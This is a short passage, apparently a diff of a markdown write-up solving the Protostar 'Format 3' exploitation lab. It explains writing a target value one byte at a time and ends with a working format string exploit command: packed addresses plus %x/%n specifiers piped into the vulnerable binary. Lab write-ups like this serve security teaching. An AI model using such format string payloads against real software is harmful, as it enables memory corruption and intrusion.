SHROUDSOURAV/Protostar-Solvings/Format 3.md

 target is 00000044 :(
 ```

 I am going to append all the necessary addresses and change their values.
 This is going to require some trial and errors.
-The best way to do this is to try to focus on 1 byte at a time.
+The best way to do this is trying to focus on 1 byte at a time.
 For example -> the **0x01025544** has **0x44** at the 1st byte(**LITTLE ENDIAN**) so change that first and move on to the 2nd,3rd and 4th byte.

 ```
 user@protostar:/opt/protostar/bin$ (python -c 'print "\xf4\x96\x04\x08" + "\xf5\x96\x04\x08" + "\xf6\x96\x04\x08" + "%56x%12$n" + "%17x%13$n" + "%173x%14$n"') | ./format3